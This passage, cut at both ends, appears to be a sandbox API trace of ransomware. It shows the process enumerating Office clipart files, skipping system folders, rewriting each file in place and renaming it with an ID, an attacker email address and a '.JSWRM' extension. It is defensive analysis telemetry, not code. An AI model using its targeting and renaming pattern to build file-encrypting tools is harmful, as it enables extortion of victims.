ftLastAccessTime.dwLowDateTime=0xcc3d96c, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0xcc3d96c, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x19ec, dwReserved0=0x60002, dwReserved1=0x20924e, cFileName="AN04191_.WMF", cAlternateFileName="")) returned 1 [0074.180] lstrcmpiW (lpString1="AN04191_.WMF", lpString2=".") returned 1 [0074.180] lstrcmpiW (lpString1="AN04191_.WMF", lpString2="..") returned 1 [0074.180] lstrcmpiW (lpString1="AN04191_.WMF", lpString2="...") returned 1 [0074.180] lstrcmpiW (lpString1="AN04191_.WMF", lpString2="windows") returned -1 [0074.180] lstrcmpiW (lpString1="AN04191_.WMF", lpString2="recovery") returned -1 [0074.180] lstrcmpiW (lpString1="AN04191_.WMF", lpString2="perflogs") returned -1 [0074.180] lstrcmpiW (lpString1="AN04191_.WMF", lpString2="documents and settings") returned -1 [0074.180] lstrcmpiW (lpString1="AN04191_.WMF", lpString2="$RECYCLE.BIN") returned 1 [0074.180] lstrcmpiW (lpString1="AN04191_.WMF", lpString2="system volume information") returned -1 [0074.180] lstrcmpiW (lpString1="AN04191_.WMF", lpString2="msocache") returned -1 [0074.180] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x240f48 [0074.180] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="AN04191_.WMF", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0074.180] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="AN04191_.WMF", cchWideChar=12, lpMultiByteStr=0x345ebd8, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="AN04191_.WMF", lpUsedDefaultChar=0x0) returned 12 [0074.180] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x240f48 | out: hHeap=0x1e0000) returned 1 [0074.180] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x241308 [0074.180] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="AN04191_.WMF", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0074.180] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="AN04191_.WMF", cchWideChar=12, lpMultiByteStr=0x345eba8, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="AN04191_.WMF", lpUsedDefaultChar=0x0) returned 12 [0074.180] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x241308 | out: hHeap=0x1e0000) returned 1 [0074.180] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x23b400 [0074.180] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2196c0 | out: hHeap=0x1e0000) returned 1 [0074.180] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0074.180] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345e8fc, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0074.180] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x2196c0 [0074.180] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\AN04191_.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\an04191_.wmf"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x460 [0074.181] GetFileSizeEx (in: hFile=0x460, lpFileSize=0x345e890 | out: lpFileSize=0x345e890*=6636) returned 1 [0074.181] SetFilePointer (in: hFile=0x460, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0074.181] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x19e0) returned 0x24c1d0 [0074.181] ReadFile (in: hFile=0x460, lpBuffer=0x24c1d0, nNumberOfBytesToRead=0x19e0, lpNumberOfBytesRead=0x345e89c, lpOverlapped=0x0 | out: lpBuffer=0x24c1d0*, lpNumberOfBytesRead=0x345e89c*=0x19e0, lpOverlapped=0x0) returned 1 [0074.183] SetFilePointer (in: hFile=0x460, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0074.183] WriteFile (in: hFile=0x460, lpBuffer=0x24c1d0*, nNumberOfBytesToWrite=0x19e0, lpNumberOfBytesWritten=0x345e898, lpOverlapped=0x0 | out: lpBuffer=0x24c1d0*, lpNumberOfBytesWritten=0x345e898*=0x19e0, lpOverlapped=0x0) returned 1 [0074.183] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x24c1d0 | out: hHeap=0x1e0000) returned 1 [0074.183] CloseHandle (hObject=0x460) returned 1 [0074.183] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x21f6d8 [0074.183] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 24 [0074.183] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d260 [0074.183] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x22d260, cchWideChar=24 | out: lpWideCharStr="symmetries@tutamail.com") returned 24 [0074.183] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d0a0 [0074.183] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d260 | out: hHeap=0x1e0000) returned 1 [0074.183] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 8 [0074.183] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x10) returned 0x23a4b0 [0074.183] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x23a4b0, cchWideChar=8 | out: lpWideCharStr="9A8I36E") returned 8 [0074.183] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23a4b0 | out: hHeap=0x1e0000) returned 1 [0074.183] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xa0) returned 0x23dbc0 [0074.183] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xee) returned 0x2472c8 [0074.183] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23dbc0 | out: hHeap=0x1e0000) returned 1 [0074.183] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d0a0 | out: hHeap=0x1e0000) returned 1 [0074.183] MoveFileW (lpExistingFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\AN04191_.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\an04191_.wmf"), lpNewFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\AN04191_.WMF.[ID-9A8I36E][symmetries@tutamail.com].JSWRM" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\an04191_.wmf.[id-9a8i36e][symmetries@tutamail.com].jswrm")) returned 1 [0074.184] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2472c8 | out: hHeap=0x1e0000) returned 1 [0074.184] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x21f6d8 | out: hHeap=0x1e0000) returned 1 [0074.184] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2196c0 | out: hHeap=0x1e0000) returned 1 [0074.184] FindNextFileW (in: hFindFile=0x231b00, lpFindFileData=0x345e928 | out: lpFindFileData=0x345e928*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0xcc3d96c, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0xcc3d96c, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0xcc3d96c, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x1204, dwReserved0=0x60002, dwReserved1=0x20924e, cFileName="AN04195_.WMF", cAlternateFileName="")) returned 1 [0074.184] lstrcmpiW (lpString1="AN04195_.WMF", lpString2=".") returned 1 [0074.184] lstrcmpiW (lpString1="AN04195_.WMF", lpString2="..") returned 1 [0074.184] lstrcmpiW (lpString1="AN04195_.WMF", lpString2="...") returned 1 [0074.184] lstrcmpiW (lpString1="AN04195_.WMF", lpString2="windows") returned -1 [0074.184] lstrcmpiW (lpString1="AN04195_.WMF", lpString2="recovery") returned -1 [0074.184] lstrcmpiW (lpString1="AN04195_.WMF", lpString2="perflogs") returned -1 [0074.184] lstrcmpiW (lpString1="AN04195_.WMF", lpString2="documents and settings") returned -1 [0074.184] lstrcmpiW (lpString1="AN04195_.WMF", lpString2="$RECYCLE.BIN") returned 1 [0074.184] lstrcmpiW (lpString1="AN04195_.WMF", lpString2="system volume information") returned -1 [0074.184] lstrcmpiW (lpString1="AN04195_.WMF", lpString2="msocache") returned -1 [0074.184] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x241178 [0074.184] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="AN04195_.WMF", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0074.184] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="AN04195_.WMF", cchWideChar=12, lpMultiByteStr=0x345ebd8, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="AN04195_.WMF", lpUsedDefaultChar=0x0) returned 12 [0074.184] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x241178 | out: hHeap=0x1e0000) returned 1 [0074.184] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x240fc0 [0074.185] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="AN04195_.WMF", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0074.185] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="AN04195_.WMF", cchWideChar=12, lpMultiByteStr=0x345eba8, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="AN04195_.WMF", lpUsedDefaultChar=0x0) returned 12 [0074.185] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x240fc0 | out: hHeap=0x1e0000) returned 1 [0074.185] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x2196c0 [0074.185] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23b400 | out: hHeap=0x1e0000) returned 1 [0074.185] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0074.185] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345e8fc, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0074.185] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x23b400 [0074.185] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\AN04195_.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\an04195_.wmf"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x460 [0074.185] GetFileSizeEx (in: hFile=0x460, lpFileSize=0x345e890 | out: lpFileSize=0x345e890*=4612) returned 1 [0074.185] SetFilePointer (in: hFile=0x460, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0074.185] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x1200) returned 0x24c1d0 [0074.185] ReadFile (in: hFile=0x460, lpBuffer=0x24c1d0, nNumberOfBytesToRead=0x1200, lpNumberOfBytesRead=0x345e89c, lpOverlapped=0x0 | out: lpBuffer=0x24c1d0*, lpNumberOfBytesRead=0x345e89c*=0x1200, lpOverlapped=0x0) returned 1 [0074.187] SetFilePointer (in: hFile=0x460, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0074.187] WriteFile (in: hFile=0x460, lpBuffer=0x24c1d0*, nNumberOfBytesToWrite=0x1200, lpNumberOfBytesWritten=0x345e898, lpOverlapped=0x0 | out: lpBuffer=0x24c1d0*, lpNumberOfBytesWritten=0x345e898*=0x1200, lpOverlapped=0x0) returned 1 [0074.187] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x24c1d0 | out: hHeap=0x1e0000) returned 1 [0074.187] CloseHandle (hObject=0x460) returned 1 [0074.187] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x21f6d8 [0074.187] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 24 [0074.187] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d260 [0074.187] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x22d260, cchWideChar=24 | out: lpWideCharStr="symmetries@tutamail.com") returned 24 [0074.187] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d0a0 [0074.187] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d260 | out: hHeap=0x1e0000) returned 1 [0074.187] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 8 [0074.187] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x10) returned 0x23a408 [0074.260] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x23a408, cchWideChar=8 | out: lpWideCharStr="9A8I36E") returned 8 [0074.260] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23a408 | out: hHeap=0x1e0000) returned 1 [0074.260] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xa0) returned 0x23d7d0 [0074.260] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xee) returned 0x2473c0 [0074.260] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23d7d0 | out: hHeap=0x1e0000) returned 1 [0074.260] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d0a0 | out: hHeap=0x1e0000) returned 1 [0074.260] MoveFileW (lpExistingFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\AN04195_.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\an04195_.wmf"), lpNewFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\AN04195_.WMF.[ID-9A8I36E][symmetries@tutamail.com].JSWRM" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\an04195_.wmf.[id-9a8i36e][symmetries@tutamail.com].jswrm")) returned 1 [0074.261] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2473c0 | out: hHeap=0x1e0000) returned 1 [0074.261] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x21f6d8 | out: hHeap=0x1e0000) returned 1 [0074.261] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23b400 | out: hHeap=0x1e0000) returned 1 [0074.261] FindNextFileW (in: hFindFile=0x231b00, lpFindFileData=0x345e928 | out: lpFindFileData=0x345e928*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0xccaffc4, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0xccaffc4, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0xccaffc4, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0xc48, dwReserved0=0x60002, dwReserved1=0x20924e, cFileName="AN04196_.WMF", cAlternateFileName="")) returned 1 [0074.262] lstrcmpiW (lpString1="AN04196_.WMF", lpString2=".") returned 1 [0074.262] lstrcmpiW (lpString1="AN04196_.WMF", lpString2="..") returned 1 [0074.262] lstrcmpiW (lpString1="AN04196_.WMF", lpString2="...") returned 1 [0074.262] lstrcmpiW (lpString1="AN04196_.WMF", lpString2="windows") returned -1 [0074.262] lstrcmpiW (lpString1="AN04196_.WMF", lpString2="recovery") returned -1 [0074.262] lstrcmpiW (lpString1="AN04196_.WMF", lpString2="perflogs") returned -1 [0074.262] lstrcmpiW (lpString1="AN04196_.WMF", lpString2="documents and settings") returned -1 [0074.262] lstrcmpiW (lpString1="AN04196_.WMF", lpString2="$RECYCLE.BIN") returned 1 [0074.262] lstrcmpiW (lpString1="AN04196_.WMF", lpString2="system volume information") returned -1 [0074.262] lstrcmpiW (lpString1="AN04196_.WMF", lpString2="msocache") returned -1 [0074.262] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x241038 [0074.262] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="AN04196_.WMF", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0074.262] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="AN04196_.WMF", cchWideChar=12, lpMultiByteStr=0x345ebd8, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="AN04196_.WMF", lpUsedDefaultChar=0x0) returned 12 [0074.262] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x241038 | out: hHeap=0x1e0000) returned 1 [0074.262] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x2410d8 [0074.262] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="AN04196_.WMF", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0074.262] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="AN04196_.WMF", cchWideChar=12, lpMultiByteStr=0x345eba8, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="AN04196_.WMF", lpUsedDefaultChar=0x0) returned 12 [0074.262] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2410d8 | out: hHeap=0x1e0000) returned 1 [0074.262] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x23b400 [0074.262] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2196c0 | out: hHeap=0x1e0000) returned 1 [0074.262] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0074.262] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345e8fc, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0074.262] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x2196c0 [0074.262] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\AN04196_.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\an04196_.wmf"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x460 [0074.263] GetFileSizeEx (in: hFile=0x460, lpFileSize=0x345e890 | out: lpFileSize=0x345e890*=3144) returned 1 [0074.263] SetFilePointer (in: hFile=0x460, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0074.263] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xc40) returned 0x24c1d0 [0074.263] ReadFile (in: hFile=0x460, lpBuffer=0x24c1d0, nNumberOfBytesToRead=0xc40, lpNumberOfBytesRead=0x345e89c, lpOverlapped=0x0 | out: lpBuffer=0x24c1d0*, lpNumberOfBytesRead=0x345e89c*=0xc40, lpOverlapped=0x0) returned 1 [0074.272] SetFilePointer (in: hFile=0x460, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0074.272] WriteFile (in: hFile=0x460, lpBuffer=0x24c1d0*, nNumberOfBytesToWrite=0xc40, lpNumberOfBytesWritten=0x345e898, lpOverlapped=0x0 | out: lpBuffer=0x24c1d0*, lpNumberOfBytesWritten=0x345e898*=0xc40, lpOverlapped=0x0) returned 1 [0074.272] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x24c1d0 | out: hHeap=0x1e0000) returned 1 [0074.272] CloseHandle (hObject=0x460) returned 1 [0074.272] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x21f6d8 [0074.272] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 24 [0074.272] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d260 [0074.272] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x22d260, cchWideChar=24 | out: lpWideCharStr="symmetries@tutamail.com") returned 24 [0074.272] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d298 [0074.273] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d260 | out: hHeap=0x1e0000) returned 1 [0074.273] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 8 [0074.273] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x10) returned 0x23a378 [0074.273] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x23a378, cchWideChar=8 | out: lpWideCharStr="9A8I36E") returned 8 [0074.273] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23a378 | out: hHeap=0x1e0000) returned 1 [0074.273] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xa0) returned 0x23d878 [0074.273] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xee) returned 0x2475b0 [0074.273] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23d878 | out: hHeap=0x1e0000) returned 1 [0074.273] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d298 | out: hHeap=0x1e0000) returned 1 [0074.273] MoveFileW (lpExistingFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\AN04196_.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\an04196_.wmf"), lpNewFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\AN04196_.WMF.[ID-9A8I36E][symmetries@tutamail.com].JSWRM" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\an04196_.wmf.[id-9a8i36e][symmetries@tutamail.com].jswrm")) returned 1 [0074.273] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2475b0 | out: hHeap=0x1e0000) returned 1 [0074.273] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x21f6d8 | out: hHeap=0x1e0000) returned 1 [0074.273] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2196c0 | out: hHeap=0x1e0000) returned 1 [0074.273] FindNextFileW (in: hFindFile=0x231b00, lpFindFileData=0x345e928 | out: lpFindFileData=0x345e928*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0xccaffc4, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0xccaffc4, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0xccaffc4, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x1df4, dwReserved0=0x60002, dwReserved1=0x20924e, cFileName="AN04206_.WMF", cAlternateFileName="")) returned 1 [0074.273] lstrcmpiW (lpString1="AN04206_.WMF", lpString2=".") returned 1 [0074.273] lstrcmpiW (lpString1="AN04206_.WMF", lpString2="..") returned 1 [0074.274] lstrcmpiW (lpString1="AN04206_.WMF", lpString2="...") returned 1 [0074.274] lstrcmpiW (lpString1="AN04206_.WMF", lpString2="windows") returned -1 [0074.274] lstrcmpiW (lpString1="AN04206_.WMF", lpString2="recovery") returned -1 [0074.274] lstrcmpiW (lpString1="AN04206_.WMF", lpString2="perflogs") returned -1 [0074.274] lstrcmpiW (lpString1="AN04206_.WMF", lpString2="documents and settings") returned -1 [0074.274] lstrcmpiW (lpString1="AN04206_.WMF", lpString2="$RECYCLE.BIN") returned 1 [0074.274] lstrcmpiW (lpString1="AN04206_.WMF", lpString2="system volume information") returned -1 [0074.274] lstrcmpiW (lpString1="AN04206_.WMF", lpString2="msocache") returned -1 [0074.274] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x2412b8 [0074.274] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="AN04206_.WMF", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0074.274] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="AN04206_.WMF", cchWideChar=12, lpMultiByteStr=0x345ebd8, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="AN04206_.WMF", lpUsedDefaultChar=0x0) returned 12 [0074.274] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2412b8 | out: hHeap=0x1e0000) returned 1 [0074.274] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x240f70 [0074.274] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, 